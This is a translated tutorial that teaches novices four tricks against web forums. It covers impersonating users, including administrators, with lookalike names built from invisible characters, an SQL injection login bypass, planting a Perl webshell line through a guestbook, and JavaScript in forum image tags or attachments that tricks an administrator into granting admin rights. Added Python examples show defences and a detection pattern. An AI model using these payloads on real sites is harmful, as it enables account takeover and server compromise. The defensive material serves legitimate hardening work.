Constructing special characters for web intrusion

Source: Internet
Author: User
Tags: server, website
LCX

Analysing the web programs running on a server, such as forums and chat rooms, finding bugs or oversights in how they were written, and then breaking in through port 80 looks like work for real hackers only. Not so: even those of us newbies (cainiao) who cannot write programs can penetrate port 80 by constructing special characters. Don't believe it? Then take a careful look at these four Little Li flying daggers, each crafted from special characters.

The first flying dagger: fish eyes passed off as pearls. We use it to post under someone else's name in a forum. Say you have taken a liking to a girl on the forum and want "her" to say "I love you". What to do? Open Notepad and press the Tab key, or Caps Lock + Tab, to produce a special blank character. Copy it, append it to the girl's user name, and register that name. Now your name looks exactly like hers, and the rest is easy. Other characters that pass as blanks are those produced by the codes AAAA, aaab or aaac in the location input method, and the HTML entity &nbsp;, which renders as a blank inside an HTML tag; both can be used as well. In my experience the AAAA/aaab/aaac characters from the location input method have an extremely high success rate against ASP programs, while the Tab character and &nbsp; work well against PHP programs. Worse still, on the WDB and IBB forums a user name constructed with the Tab key gets the same permissions as the original user: if the original user is Administrator, the impersonating account you register also becomes Administrator.
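The defence against this dagger is to compare user names only after every blank-looking character has been stripped. The following is an added example, not code from the article or from any of the forums it names, in Python: a registration check that canonicalises a name (HTML entities such as &nbsp; decoded, full-width and ideographic spaces folded, all whitespace, control and invisible characters removed, case folded) and refuses it if it collides with an existing account. The full-width space U+3000 is assumed here to stand for the blanks the input-method codes produce.

```python
# Added example (not from the original article): reject a registration whose name
# collapses onto an existing one once tab, &nbsp;, full-width spaces, zero-width
# characters and letter case are neutralised.
import html
import unicodedata


def canonical_name(name: str) -> str:
    """Reduce a user name to the form used for uniqueness comparison."""
    # Decode entities first, so "&nbsp;" becomes U+00A0 and "&#9;" becomes a tab.
    name = html.unescape(name)
    # NFKC folds full-width letters to ASCII and compatibility spaces
    # (U+00A0, U+3000, ...) to a plain U+0020.
    name = unicodedata.normalize("NFKC", name)
    # Drop every whitespace, control (Cc) and format (Cf, e.g. zero-width) character.
    name = "".join(
        ch for ch in name
        if not (ch.isspace() or unicodedata.category(ch) in ("Zs", "Cc", "Cf"))
    )
    return name.casefold()


def registration_allowed(new_name: str, existing) -> bool:
    """True only if new_name is distinct from every existing name after canonicalisation."""
    wanted = canonical_name(new_name)
    if not wanted:  # a name made only of blanks is rejected outright
        return False
    return all(wanted != canonical_name(e) for e in existing)


if __name__ == "__main__":
    taken = ["Administrator", "meimei"]  # constructed sample accounts
    attempts = ["Administrator\t", "administrator&nbsp;", "\u3000meimei",
                "\uff21\uff24\uff2d\uff29\uff2e", "newuser"]
    for attempt in attempts:
        print(repr(attempt), "->", registration_allowed(attempt, taken))
```

The same canonical form should be used when the forum looks up the poster of a message, otherwise the display name is compared rather than the account.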

The second flying dagger: deceive the heavens to cross the sea. ASP web programs commonly put a login page that checks the administrator account and password in front of the back-end management pages. This kind of check is often flawed: entering ' or ''= ' as both the user name and the password takes you straight to the management page. Why? Let me explain briefly. Look at the original program:

    user = Request.Form("user")
    pass = Request.Form("pass")
    ......
    sql = "select * from guestbook where user='" & user & "' and pass='" & pass & "'"

If we enter ' or ''= ' as the user or pass value, the SQL statement above becomes

    select * from guestbook where user='' or ''='' and pass='' or ''=''

Anyone who knows a little SQL can see that the injected ' or ''= ' makes the WHERE condition true for every row, so the program believes the login succeeded and we are through. That sounds abstract, so here is a concrete case: this vulnerability exists in the Confidence article management system, a program I grabbed from the Internet; see the figure. Enter ' or ''= ', using the special characters given above, as both account and password and you reach the back-end management.
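To make the mechanism concrete, here is an added example (not the article's ASP code) in Python against an in-memory SQLite table: the same login written once with string concatenation, exactly as in the ASP snippet, and once with bound parameters. The table name guestbook and its rows are constructed sample data.

```python
# Added example (not from the original article): the guestbook login written the
# vulnerable way and the parameterised way, side by side, against SQLite.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a single administrator row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table guestbook (user text, pass text, role text)")
    conn.execute("insert into guestbook values ('admin', 's3cret', 'administrator')")
    return conn


def login_concat(conn, user: str, pwd: str):
    """Vulnerable: input is spliced into the SQL text, like the ASP snippet above."""
    sql = ("select role from guestbook where user='" + user
           + "' and pass='" + pwd + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(conn, user: str, pwd: str):
    """Hardened: placeholders keep the quote characters inside the data."""
    sql = "select role from guestbook where user=? and pass=?"
    row = conn.execute(sql, (user, pwd)).fetchone()
    return row[0] if row else None


PAYLOAD = "' or ''='"  # the input the article describes


if __name__ == "__main__":
    db = make_db()
    # With concatenation the WHERE clause is true for every row, so the first
    # row (the administrator) comes back without any password.
    print("concat :", login_concat(db, PAYLOAD, PAYLOAD))
    # With parameters the same input is just a user name that does not exist.
    print("param  :", login_param(db, PAYLOAD, PAYLOAD))
    print("real   :", login_param(db, "admin", "s3cret"))
```

Parameterising the query is the fix for the injection; storing a password hash instead of the clear-text pass column is a separate improvement the snippet also needs.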

The third flying dagger: a secret passage to Chencang. Recently many articles about breaking into the LB forum have appeared on the Internet, and without exception they rely on constructing special characters. As everyone knows, once the line of code system @argv;# is written into a CGI or Perl program, that program becomes a webshell: requesting http://ip/*.pl?dir (where the *.pl file contains the line system @argv;#) shows the physical directory of the website. Take agbii, a free CGI guestbook that is very popular on the Internet. Each message you leave is stored by message number, user name, title and content, and the N-th message is written into a file under a fixed directory named data/<user name>. This sounds complicated; see the figure.
For example, suppose I leave the first message in this site's guestbook with the user name system, the title @argv;# and the content Haha. Then the file 10.pl in the data/222 directory will have the content shown in the figure.

Read the figure of the signed message carefully: the owner of this guestbook is user 222. Now we request http://192.168.1.3/book/data/222/10.pl?dir and get a shell.
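The guestbook's two mistakes are storing user-supplied text under a server-executable extension and letting that text contain Perl execution primitives. The following is an added example, not part of the article or of any guestbook it names, in Python: an audit that walks a guestbook data directory and flags both conditions. The directory layout data/222/10.pl and the message contents are constructed to mirror the case above.

```python
# Added example (not from the original article): audit a CGI guestbook's data
# directory for user entries stored as executable scripts or containing Perl
# execution primitives such as the article's "system @argv;#".
import os
import re
import tempfile

EXEC_EXT = {".pl", ".cgi", ".php", ".asp"}
# system/exec/eval followed by a list or call, backtick commands, or @ARGV itself.
DANGEROUS = re.compile(r"\b(system|exec|eval)\b\s*[@(]|`[^`]*`|@ARGV", re.IGNORECASE)


def audit_file(path: str) -> list:
    findings = []
    ext = os.path.splitext(path)[1].lower()
    if ext in EXEC_EXT:
        findings.append(f"{path}: user data stored with executable extension {ext}")
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if DANGEROUS.search(line):
                findings.append(f"{path}:{lineno}: execution primitive in message text: {line.strip()!r}")
    return findings


def audit_dir(root: str) -> list:
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            findings.extend(audit_file(os.path.join(dirpath, name)))
    return findings


def build_sample(root: str) -> None:
    """Constructed sample: one harmless entry and one shaped like the article's."""
    user_dir = os.path.join(root, "data", "222")
    os.makedirs(user_dir)
    with open(os.path.join(user_dir, "9.pl"), "w") as fh:   # .pl is the guestbook's choice
        fh.write("# 9 | alice | hello | just saying hi\n")
    with open(os.path.join(user_dir, "10.pl"), "w") as fh:
        fh.write("# 10 | system | @argv;# | haha\nsystem @argv;#\n")


def run_sample_audit() -> list:
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return audit_dir(tmp)


if __name__ == "__main__":
    for finding in run_sample_audit():
        print(finding)
```

The real fix is to keep message data out of any directory the web server will execute from and to store it with a non-script extension; the audit only tells you where that rule is already broken.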

The fourth flying dagger: Taigong fishing. This is an interesting but harder technique: cross-site scripting. I will only cover the part a newbie can use. Curiously, the UBB code of forum posts has a bug: if you put a Javascript URL instead of an image between [img] and [/img], it still executes. Post a message whose content is [img]javascript:alert("xx")[/img]; whoever clicks the post gets a JS dialog box (see Hacker X Files).

Write [img]javascript:alert("xx");self.open("http://URL")[/img] instead, and after the dialog box a new browser window opens on that page. What if that page holds a web trojan? Web trojans are outside this article. Suppose the URL that promotes the user hack to administrator on this forum is http://ip/BBS/upadmin?user=hack. Naturally, this URL only takes effect when requested by an administrator. So we write it into the post and lure the forum's real administrator into viewing it; once an administrator who is logged on clicks the post, the ordinary registered user hack becomes a forum administrator. Attachments work the same way. Upload a TXT attachment whose content is the hack-administrator URL: because of a bug in Internet Explorer, any file on the server that contains HTML code is rendered as an HTML page whatever its suffix, so when the administrator clicks the TXT attachment the URL adding hack as administrator is executed. The HTML and script code inside [img][/img] or inside the TXT file can be constructed carefully enough that the forum administrator never notices that clicking it executed a URL.
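On the forum side the two vectors above are closed by rendering [img] only for plain http(s) URLs and by serving attachments so the browser cannot reinterpret them. The following is an added example, not code from the article or from any UBB implementation, in Python: a renderer that turns [img]...[/img] into an img element only when the URL's scheme is http or https (after removing the whitespace and control characters browsers ignore inside a scheme), shows rejected tags as escaped text, and a helper that returns headers for serving an uploaded TXT file as inert text. The header names are standard HTTP; the function name attachment_headers is this example's own.

```python
# Added example (not from the original article): safe rendering of UBB [img] tags
# and headers for serving attachments without content sniffing.
import html
import re
from typing import Optional
from urllib.parse import urlsplit

IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
ALLOWED_SCHEMES = {"http", "https"}


def safe_image_url(raw: str) -> Optional[str]:
    """Return the URL if it is an absolute http(s) URL, otherwise None."""
    # Browsers skip whitespace/control characters inside a scheme ("java\tscript:"),
    # so strip them before looking at the scheme at all.
    cleaned = "".join(ch for ch in raw if ch.isprintable() and not ch.isspace())
    parts = urlsplit(cleaned)  # urlsplit lower-cases the scheme for us
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return None  # javascript:, data:, protocol-relative and bare paths all fail here
    return cleaned


def render_ubb(text: str) -> str:
    """Escape the post text and expand only [img] tags with an acceptable URL."""
    out, pos = [], 0
    for m in IMG_TAG.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        url = safe_image_url(m.group(1))
        if url is None:
            out.append(html.escape(m.group(0)))  # rejected: the tag is shown literally
        else:
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


def attachment_headers(filename: str) -> dict:
    """Headers that stop a browser from rendering an uploaded .txt as HTML."""
    return {
        "Content-Type": "text/plain; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="%s"' % filename.replace('"', ""),
    }


if __name__ == "__main__":
    print(render_ubb('[img]javascript:alert("xx");self.open("http://URL")[/img]'))
    print(render_ubb("see [img]http://example.com/a.png[/img] here"))
    print(attachment_headers("note.txt"))
```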

To close: these four flying daggers are not very sharp, and they will not cut every server's throat in a single stroke. But against most online forums, chat rooms and other web applications, well ...... as that saying goes ...... Little Li's flying dagger never misses.
